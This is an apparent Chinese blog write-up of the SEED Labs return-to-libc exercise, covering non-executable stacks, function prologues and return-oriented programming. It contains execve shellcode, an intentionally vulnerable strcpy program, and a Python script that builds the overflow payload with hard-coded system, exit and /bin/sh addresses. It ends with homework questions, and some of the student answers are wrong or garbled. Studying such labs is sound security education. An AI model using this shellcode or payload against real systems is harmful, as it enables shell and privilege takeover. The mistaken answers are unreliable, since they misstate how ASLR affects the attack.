本文主要是介绍seed-labs(return-to-libc),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
软件安全-return-to-libc
- 概要
- 攻击环境
- 攻击阶段
- 找到system()函数的地址
- 找到字符串/bin/sh的地址
- 第二部分 return-to-libc
- 函数的序言
- 返回导向编程
- problems
概要
缓冲区溢出漏洞是把恶意代码注入到目标程序栈中发动攻击。为了抵御这种攻击,操作系统采用一个称为不可执行栈 的防御措施。这种防御措施能被另一种无须在栈中运行代码的攻击方法绕过,这种方法叫return-to-libc攻击。
shellcode.c
#include <string.h>const char code[] = "\x31\xc0""\x50""\x68""//sh""\x68""/bin""\x89\xe3""\x50""\x53""\x89\xe1""\x99""\xb0\x0b""\xcd\x80";int main(int argc, char **argv)
{char buffer[sizeof(code)];strcpy(buffer, code); # 代码复制到栈中((void(*)())buffer)(); # 执行代码
}
[06/14/21]seed@VM:~$ mkdir return-to-libc
[06/14/21]seed@VM:~$ cd return-to-libc/
[06/14/21]seed@VM:~/return-to-libc$ vim shellcode.c
[06/14/21]seed@VM:~/return-to-libc$ gcc -z execstack shellcode.c
[06/14/21]seed@VM:~/return-to-libc$ a.out
$ ^C # 另开一个shell
$ ^C
$ exit
[06/15/21]seed@VM:~/return-to-libc$ gcc -z noexecstack shellcode.c # 让栈不可执行
[06/15/21]seed@VM:~/return-to-libc$ a.out #执行结果
Segmentation fault如果想要改变一个编译好的可行栈比特位 可以用一个execstack 的工具
内存中有一个区域存放很多代码,主要是标准C语言库函数,在linux 中,就是libc ,是个动态链接,
libc中有个函数最容易被利用,system()
上图为攻击原理,代码存放在不可执行的栈中,但是到最终的栈的时候调用了可执行共享库,所以攻击由此产生
攻击环境
#include <stdlib.h>
#include <stdio.h>
#include <string.h>int foo(char *str)
{char buffer[100];strcpy(buffer, str);return 1;
}int main(int argc, char **argv)
{char str[400];FILE *badfile;badfile = fopen("badfile", "r");fread(str, sizeof(char), 300, badfile);foo(str);printf("Returned Properly\n");return 1;
}
攻击阶段
找到system()函数的地址
由此可见,当一个需要libc的程序运行时,libc函数库将被加载到内存中。
需要注意的是对于同一个程序,如果把它从set-uid改写成非set-uid程序,libc函数库的加载地址是不一样的
找到字符串/bin/sh的地址
为了让system()函数 “/bin/sh” 字符串"bin/sh"需要预先存在内存中,它的地址需要作为参数传给system()
export MYSHELL="/bin/sh"
#include <stdio.h>
#include <stdlib.h>int main()
{char *shell = (char *)getenv("MYSHELL");if (shell){printf(" Value: %s \n", shell);printf(" Address: %x\n", (unsigned int)shell);}return 1;
}
第二部分 return-to-libc
栈顶ebp在system最后一个参数位置处,4的位置就是 buffer函数地址。
如果计算出ebp到buffer的距离,就能够算出三个位置距离缓冲区起始位置的偏移值。
system函数的地址是偏移 + 4
exit函数的地址是偏移 + 8
字符串/bin/sh的地址是偏移 + 12
函数的序言
当调用函数时,返回地址(RA)被推到堆栈中。这是函数序言执行之前的函数的开始。堆栈指针(esp寄存器)指向RA位置。
上一帧指针被推到堆栈中,因此当函数返回时,调用方的帧指针将被恢复。
堆栈指针现在指向上一帧指针。帧指针(ebp)现在指向当前堆栈指针,以便帧指针始终指向旧帧指针。
堆栈指针现在移动N字节,为函数的局部变量留出空间。
堆栈指针现在指向帧指针所指向的位置,以便释放为局部变量分配的堆栈空间。
前一帧指针被分配给%ebp以恢复调用者函数的帧指针。
返回地址从堆栈中弹出,程序跳转到该地址。此指令移动堆栈指针。
/* prog.c */
void foo(int x)
{int a;a = x;
}void bar()
{int b = 5;foo (b);
}
gcc -S 将程序转成汇编代码
#!/usr/bin/python3
import sys# 给content填上非零值
content = bytearray(0xaa for i in range(300))a3 = 0xbfffff56 # /bin/sh的地址
content[120:124] = (a3).to_bytes(4, byteorder='little')a2 = 0xb7e56260 # exit函数地址
content[116:120] = (a2).to_bytes(4, byteorder='little')a1 = 0xb7e63310 # system函数地址
content[112:116] = (a1).to_bytes(4, byteorder='little')file = open("badfile", "wb")
file.write(content)
file.close()
system(cmd) 不是直接运行cmd,而是先运行/bin/sh,
返回导向编程
return-to-libc攻击不需要一定返回到一个个已有函数,从而把return-to-libc攻击推广到返回导向编程
攻击者可以跳到栈以外的代码,而不是栈中的代码,这就是return-to-libc的攻击思想
problems
1, After using the "-z noexecstack" option to compile a C program, a buffer-overflow
attack that causes the vulnerable program to return to the code on the stack is supposed
to fail, but some students find out that the attack is still successful. What could be the
reason? The students did everything correctly.成功了是因为确实在程序调用的时候使用了栈外system()执行了代码,而失败则是应为同样是栈内的2 In the function epilogue, the previous frame pointer, which is stored in the area below
the return address, will be retrieved and assigned to the ebp register. However, when
we overflow the return address, the previous frame pointer region is already modified, so
after the function epilogue, ebp contains some arbitrary value. Does this matter?
有关系,前面返回值的地址被修改且结束语包含任意 值则地址会被修改,随机地址分布,不容易被攻击3 Instead of jumping to the system() function, we would like to jump to the execve()
function to execute "/bin/sh". Please describe how to do this. You are allowed to
have zeros in your input (assume that memcpy() is used for memory copy, instead of
strcpy())
在发起return to libc攻击时,攻击者不会跳转到system()函数的开头,而是使程序跳转到system()函数序言之后的第一条指令。请描述攻击者应该如何构造输入数组。4 As we know, the system() function calls /bin/sh, which is a symbolic link to
/bin/bash. Recent versions of bash will drop the privilege if it detects that the
effective user ID and the real user ID are different. Assume that we still want to use
system() in our Return-to-libc attack, please describe how you can overcome this
challenge. You are allowed to have zeros in your input (assume that memcpy() is used
for memory copy, instead of strcpy())
如果我们还想使用system(), 则需要对当前陈旭变成set-uid程序5 When launching the return-to-libc attack, instead of jumping to the beginning of the
system() function, an attacker causes the program to jump to the first instruction right
after the function prologue in the system() function. Please describe how the attacker
should construct the input array6 Can address space layout randomization help defeat the return-to-libc attack?
没有左右,地址随机分布作用的是内存,然而return-to-libc是跳到栈以为的地址执行7 Does ASLR in Linux randomize the addresses of library functions, such as system()?
是的8 Assuming that we do not have the function system() that we can return to in our
Return-to-libc atack, but we know the instruction sequence A1, ..., Am, B1, ..., Bn, C1,
..., Ct can spawn a shell for us. If all the instructions in this sequence are located in
contiguous memory, we can simply jump to its beginning. Unfortunately, that is not the
case. The instructions in this sequence actually come from three sub-sequences, A, B, and
C, each of which is found at the end of a function, i.e., there is always a ret instruction
at the end of each sub-sequence. Each sub-sequence’s address is given below:
0xAABB1180: A1, ..., Am, ret
0xAABB2290: B1, ..., Bn, ret
0xAABB33A0: C1, ..., Ct, ret
Obviously, when we overflow a buffer, we will place 0xAABB1180 in the return address
field, so when the function returns, it will jump to the beginning of the sub-sequence
2 Return-to-libc Attack and ROP
A. Please describe what other values that you would place on the stack, so when the
sub-sequence A returns, it will jump to the sub-sequence B, and when the sub-sequence
B returns, it will jump to the sub-sequence C.
What is described above is called Return-Oriented Programming (ROP), which is a
generalized Return-to-libc technique. The Return-to-libc technique depends on the
availability of some functions such as system(); if such functions are not in the
memory, the technique will not work. With the ROP technique, an attacker can carefully
choose machine instruction sequences that are already present in the machine’s memory,
such that when these sequences are chained together, they can achieve the intended goal.
These sequences are called gadgets, which typically end in a return (ret) instruction
and are located in a subroutine within the existing program and/or shared library code.
The ret instruction is necessary, because the ROP technique depends on it to jump from
one sub-sequence to another. ROP gadgets can be chained together to allow an attacker to
perform arbitrary operations. Using ROP, the attacker does not need to call functions to
mount an attack.
Function foo() has a buffer overflow problem when copying your input to a buffer
that is inside its stack frame. We would like to get it to return to a sequence of function
calls: bar() ➙ bar() ➙ bar() ➙ xyz(3, 5) ➙ exit(). Assuming we
know their address. Please describe how you would use the buffer overflow problem to
construct the stack before letting foo() return. You should provide a stack diagram in
your answer
这篇关于seed-labs(return-to-libc)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!